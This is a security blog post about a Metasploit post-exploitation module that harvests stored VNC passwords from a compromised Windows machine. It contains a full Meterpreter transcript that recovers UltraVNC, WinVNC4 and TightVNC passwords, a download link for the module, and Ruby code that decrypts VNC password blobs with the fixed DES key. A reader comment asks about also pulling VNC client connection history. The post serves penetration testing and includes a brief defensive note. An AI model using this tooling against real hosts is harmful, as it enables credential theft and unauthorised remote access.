Metasploit VNC Password Extraction

Tuesday, March 22, 2011

Rob Fuller


Chris Gates wrote a blog post about the 'getvncpw' meterpreter script. I ran into the same issue on Penetration Tests in the past but didn't know much about the whacked out version of DES that RFB (the VNC protocol) was using.

Not being a fan of manually editing a binary and compiling each time I had a password to crack I wanted to find another way, but didn't get a chance to.

Yesterday I saw this ticket: https://www.metasploit.com/redmine/issues/3183 and thought to myself: "That's definitely within my coding ability to contribute a patch for".

After almost 15 hours of coding between 9 pm on Saturday and 8 pm on Sunday, it went far beyond just adding a bit of code to support UltraVNC.

changelog:

  • Complete rewrite as a post module instead of a meterpreter script
  • Passwords of less than 8 characters are correctly padded (thanks jduck)
  • UltraVNC checks added
  • TightVNC checks added for both VNC and its control console
  • Made it very simple to add new checks in either the registry or in a file
  • Output is a bit more verbose (lets you know something is happening)
  • Reports authentication credentials found to database
  • Identifies the port that VNC is running on as well

It isn't in the Metasploit trunk, so until/if it gets added you can get it here:

http://www.room362.com/scripts-and-programs/metasploit/enum_vnc_pw.rb

If you have a check, find it breaks for some reason or another, or just want to tell me that I suck, please leave a comment or email me.

Here it is in action against my VM with 3 different VNC servers on it (calling the post module in two separate ways):

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: XPBASELINE\Administrator
meterpreter > background
msf exploit(handler) > use post/windows/gather/enum_vnc_pw
msf post(enum_vnc_pw) > set SESSION 1
SESSION => 1
msf post(enum_vnc_pw) > show options

Module options (post/windows/gather/enum_vnc_pw):

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
SESSION  1                yes       The session to run this module on.

msf post(enum_vnc_pw) > run

[*] Enumerating VNC passwords on XPBASELINE
[*] Checking UltraVNC...
[+] UltraVNC => A85B4C5976979DE93B => thisismy on port: 5900
[+] VIEW ONLY: UltraVNC => DE2C1BA7393F6708B3 => 111 on port: 5900
[*] Checking WinVNC3_HKLM...
[*] Checking WinVNC3_HKCU...
[*] Checking WinVNC3_HKLM_Default...
[*] Checking WinVNC3_HKCU_Default...
[*] Checking WinVNC_HKLM_Default...
[*] Checking WinVNC_HKCU_Default...
[*] Checking WinVNC4_HKLM...
[+] WinVNC4_HKLM => c777b2de337a91cf => mypasswo on port: 5900
[*] Checking WinVNC4_HKCU...
[*] Checking RealVNC_HKLM...
[*] Checking RealVNC_HKCU...
[*] Checking TightVNC_HKLM...
[+] TightVNC_HKLM => 7ebf1e76f732459f => authpass on port: 5900
[*] Checking TightVNC_HKLM_Control_pass...
[+] TightVNC_HKLM_Control_pass => f0299fd0e927cf2f => adminpas on port: 5900
[*] Post module execution completed

msf post(enum_vnc_pw) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > run post/windows/gather/enum_vnc_pw
[*] Enumerating VNC passwords on XPBASELINE
[*] Checking UltraVNC...
[+] UltraVNC => A85B4C5976979DE93B => thisismy on port: 5900
[+] VIEW ONLY: UltraVNC => DE2C1BA7393F6708B3 => 111 on port: 5900
[*] Checking WinVNC3_HKLM...
[*] Checking WinVNC3_HKCU...
[*] Checking WinVNC3_HKLM_Default...
[*] Checking WinVNC3_HKCU_Default...
[*] Checking WinVNC_HKLM_Default...
[*] Checking WinVNC_HKCU_Default...
[*] Checking WinVNC4_HKLM...
[+] WinVNC4_HKLM => c777b2de337a91cf => mypasswo on port: 5900
[*] Checking WinVNC4_HKCU...
[*] Checking RealVNC_HKLM...
[*] Checking RealVNC_HKCU...
[*] Checking TightVNC_HKLM...
[+] TightVNC_HKLM => 7ebf1e76f732459f => authpass on port: 5900
[*] Checking TightVNC_HKLM_Control_pass...
[+] TightVNC_HKLM_Control_pass => f0299fd0e927cf2f => adminpas on port: 5900
meterpreter >
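The stored values in the transcript are recoverable by anyone who can read the registry key or ini file because the "encryption" is single DES under a fixed key that ships with every VNC implementation, with the password truncated or NUL-padded to 8 bytes. The following is an added example, not code from the post or from enum_vnc_pw; it assumes Ruby's bundled OpenSSL binding and uses the well-known fixed key, and it checks itself against the blobs printed above.

```ruby
require 'openssl'

# VNC servers (RealVNC/WinVNC4, TightVNC, UltraVNC) store the password as a
# single-DES block under a fixed key that ships with every implementation.
# VNC's d3des library consumes key bits in reverse order per byte, so a
# standard DES library needs the bit-reversed key: 17 52 6b 06 23 4e 58 07
# becomes e8 4a d6 60 c4 72 1a e0. Neither value is secret.
VNC_FIXED_KEY = [0x17, 0x52, 0x6b, 0x06, 0x23, 0x4e, 0x58, 0x07].pack('C*').freeze

def reverse_bits(bytes)
  bytes.unpack('C*').map { |b| ('%08b' % b).reverse.to_i(2) }.pack('C*')
end

# Single DES expressed as 3DES with K1 = K2 = K3: E(D(E(x))) == E(x).
# This avoids OpenSSL 3 builds that move plain DES-ECB into the legacy provider.
def des_ecb(block, key, encrypt)
  cipher = OpenSSL::Cipher.new('DES-EDE3')
  encrypt ? cipher.encrypt : cipher.decrypt
  cipher.key = reverse_bits(key) * 3
  cipher.padding = 0                      # exactly one 8-byte block, no PKCS#7
  cipher.update(block) + cipher.final
end

# What vncpasswd-style tools write: truncate to 8 bytes, NUL-pad shorter
# passwords (the padding case fixed in the changelog above), encrypt once.
def vnc_obfuscate(password)
  block = password.b[0, 8].ljust(8, "\x00")
  des_ecb(block, VNC_FIXED_KEY, true).unpack1('H*')
end

# Reverse it. The UltraVNC values in the transcript are 9 bytes long; only the
# first 8 bytes are the DES block, so anything past 16 hex digits is ignored.
def vnc_deobfuscate(hex)
  block = [hex[0, 16]].pack('H*')
  des_ecb(block, VNC_FIXED_KEY, false).delete("\x00")
end

if $PROGRAM_NAME == __FILE__
  # Values taken from the module output above.
  %w[c777b2de337a91cf 7ebf1e76f732459f A85B4C5976979DE93B DE2C1BA7393F6708B3].each do |h|
    puts "#{h} => #{vnc_deobfuscate(h)}"
  end
  puts "111 re-encrypts to #{vnc_obfuscate('111')}"
end
```

The practical consequence for defenders is that ACLs on HKLM\Software\... VNC keys and on ultravnc.ini are the only thing standing between a local reader and the remote-access password, so treat those values as plaintext when scoping who can read them.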

Cross-posted from Room362

shawn merdinger:

Hi Rob,

Cool post and thanks for sharing!

I'm wondering if anyone has looked into pulling settings from the VNC clients that include servers the clients have previously connected to. For example, in the portableapps TightVNC viewer_settings.ini file? Given the pervasive re-use of credentials, it might be useful information.

Example from the TightVNC portableapps version, showing a previous connection to "my.host.org":

80000001\Software\ORL\VNCviewer\History\my.host.org:1]
use_encoding_0=D1
use_encoding_1=D1
use_encoding_2=D1
use_encoding_3=D0
use_encoding_4=D1
use_encoding_5=D1
use_encoding_6=D1
use_encoding_7=D1
use_encoding_8=D1
preferred_encoding=D7
restricted=D0
viewonly=D0
fullscreen=D0
scaling=D0
8bit=D0
shared=D1
swapmouse=D0
belldeiconify=D0
emulate3=D1
emulate3timeout=D100
emulate3fuzz=D4
disableclipboard=D0
fitwindow=D0
scale_den=D1
scale_num=D1
cursorshape=D1
noremotecursor=D0
compresslevel=D-1
quality=D6

Cheers,
--scm